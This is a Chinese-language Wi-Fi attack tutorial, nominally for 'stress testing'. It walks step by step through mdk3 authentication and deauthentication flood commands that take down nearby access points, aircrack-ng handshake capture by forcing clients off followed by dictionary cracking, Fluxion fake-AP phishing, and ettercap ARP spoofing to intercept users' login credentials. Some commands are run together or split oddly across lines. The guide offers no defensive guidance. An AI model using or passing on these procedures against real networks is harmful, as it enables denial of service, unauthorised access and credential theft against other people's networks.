測試使用無線網卡:RT8187
DOS攻擊壓力測試
攻擊者發送和偽造大量數據包至AP進行攻擊,將導致AP無法提供正常的服務或資源訪問。在無線網絡的環境下,常見的幾種DOS攻擊:
<code>Authentication
Flood
Deauthentication
Flood
Disassociation
Flood
RF
Jamming
Association
Flood等
/<code>
用mdk3實現dos攻擊:
掛載無線網卡,激活網卡為監聽模式
<code>airmon-ngstart
wlan0/<code>
掃描附近的無線信號
<code>airodump-ng mon0/<code>
1、身份驗證攻擊(Authentication Flood)
這是一種驗證請求攻擊模式:在這個模式裡,軟件自動模擬隨機產生的mac向目標AP發起大量驗證請求,可以導致AP忙於處理過多的請求而停止對正常連接客戶端的響應操作:
<code>mdk3
mon0 a -a MAC/<code>
2、偽造斷開連接(Deauthentication Flood)
在這個模式下,軟件會向周圍所有可見AP不斷髮出“斷開連接”的包,可以造成一定範圍內的無線網絡癱瘓(當然有白名單,黑名單模式),直到手動停止攻擊!-C 後面跟的是信道。
<code>mdk3
mon0 d -c11
/<code>
可以利用-s參數來加快發包速率,另外可以使用-w(白名單) –b(黑名單)來添加mac地址,這樣我們就可以使自己偽造的AP永遠的不受自己的攻擊所影響,而黑白名單可以寫單獨的一個mac也可以寫文件的絕對路徑,然後把要加入名單的mac寫在文件裡。
密碼破解
抓取握手包破解WiFi密碼
1、aircrack暴力破解無線密碼
掛載無線網卡,激活網卡為監聽模式
<code>airmon-ngstart
wlan0/<code>
掃描附近的無線信號,主要是找對應的信道
<code>airodump-ng mon0/<code>
監聽某信道WiFi並保存報文
<code>airodump-ng -c
11
-w /root/baowen mon0/<code>
使目標斷線重連抓取握手包(例如進行10次dos攻擊是終端斷線重連抓包)
<code>aireplay-ng
-0
10
-a
wifi的mac地址
-c
客戶端mac地址
mon0
/<code>
抓到握手包後即可ctrl+c 結束,開始破解
<code>aircrack-ng -w 字典目錄 報文目錄/<code>
<code>eg: aircrack-ng -w ./pass/wifipass.txt ./baowen/123
-01.
cap
/<code>
2、使用自動化工具fluxion進行密碼破解和AP欺騙
Fluxion 可進行暴力破解和偽造AP攻擊獲取無線信息
運行fluxion,選擇語言、信道
確認後會運行airodump-ng掃描無線熱點
出現目標ssid後Ctrl+C結束,會顯示掃描的熱點信息
選擇對應的熱點,執行後執行dos攻擊斷開目標連接進而抓取握手包
可直接保存抓取的握手包進行暴力破解,同時也可選擇偽造AP進行欺騙
嗅探、中間人攻擊
攻擊者處於無線局域網中,若網絡未作端口隔離,可利用ARP欺騙等手段,對同網段用戶,進行中間人攻擊,並分析獲取用戶信息。可能導致無線數據篡改使得WLAN業務系統正常訪問數據被非法竊取、篡改和破壞。
使用ettercap工具嗅探用戶數據
首先啟用路由轉發
<code>echo1
>>/proc/sys
/net/ipv
4/ip_forward/<code>
使用ARP欺騙,利用ettercap實現中間人攻擊
指定網卡,Unified sniffing 選擇eth0
掃描主機scan for hosts
查看hosts list
此處選擇要欺騙的主機,點擊Add to target 1,選擇網關Add to target 2
選擇菜單Mitm,勾選Sniff remote connections
開始欺騙嗅探
通過菜單欄View -> connection可以查看嗅探的數據(登錄用戶名密碼信息)